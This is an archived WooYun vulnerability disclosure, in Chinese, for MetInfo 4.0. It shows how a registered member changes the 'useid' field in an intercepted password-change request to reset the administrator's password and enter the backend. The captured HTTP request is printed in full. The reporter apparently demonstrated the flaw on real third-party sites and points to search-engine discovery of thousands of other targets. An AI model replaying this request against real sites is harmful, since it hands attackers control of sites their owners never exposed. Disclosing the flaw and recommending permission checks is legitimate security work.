乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-12: 细节已通知厂商并且等待厂商处理中 2015-03-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-11: 细节向核心白帽子及相关领域专家公开 2015-05-21: 细节向普通白帽子公开 2015-05-31: 细节向实习白帽子公开 2015-06-15: 细节向公众公开
MetInfo4.0注册会员后,可以修改任意用户和管理员密码,影响特别大,百度里可以找到上千用MetInfo4.0的企业站,危害特别严重!PS:可以从乌云里看到很多大神级人物,是个学习的好地方,求给个邀请码!(*^__^*) 嘻嘻
百度搜索随便就一大堆,此前没有看到过这个版本的漏洞导致很多人还在继续用4.0版本
随便找个网站http://gz-xinyuan.com/,先注册个会员
然后登录会员,点击“修改基本信息”
然后修改密码的时候进行抓包
POST /member/save.php?action=editor HTTP/1.1Host: www.lnlyadsj.comProxy-Connection: keep-aliveContent-Length: 260Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.lnlyadsj.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.lnlyadsj.com/member/editor.php?lang=cnAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: PHPSESSID=gfgefsij66f8u4klnvss58l6b4; safedog-flow-item=B9850B9D6113085D; CNZZDATA1670348=cnzz_eid%3D825064714-1426134540-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1426134540useid=ceshiyong&lang=cn&pass1=ceshi&pass2=ceshi&realname=&sex=1&tel=&mobile=&email=21617372%40qq.com&qq=&msn=&taobao=&admin_introduction=&companyname=ceshiyong&companyfax=&companycode=&companyaddress=&companywebsite=&Submit=%E6%8F%90%E4%BA%A4%E4%BF%A1%E6%81%AF
useid直接修改成管理员帐号,修改前:
修改后:
提交显示“操作成功!”
直接进后台
修改密码的时候进行抓包
修改密码时增加权限验证
危害等级:无影响厂商忽略
忽略时间:2015-06-15 15:59
暂无